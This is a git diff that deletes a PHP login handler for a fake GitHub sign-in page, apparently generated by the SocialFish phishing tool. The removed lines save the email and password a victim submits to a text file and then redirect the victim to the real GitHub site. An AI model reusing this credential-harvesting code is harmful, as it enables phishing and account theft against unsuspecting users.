diff --git a/WebPagesTermux/github/login.php b/WebPagesTermux/github/login.php deleted file mode 100644 index 59ca635..0000000 --- a/WebPagesTermux/github/login.php +++ /dev/null @@ -1,15 +0,0 @@ -There's a Phishing Page generated by SocialFish in this website."; -if($myFile == $searchString) { - file_put_contents("cat.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); - header('Location: https://github.com'); -} -if($myFile != $searchString) { - echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME"; -} -exit(); -?> -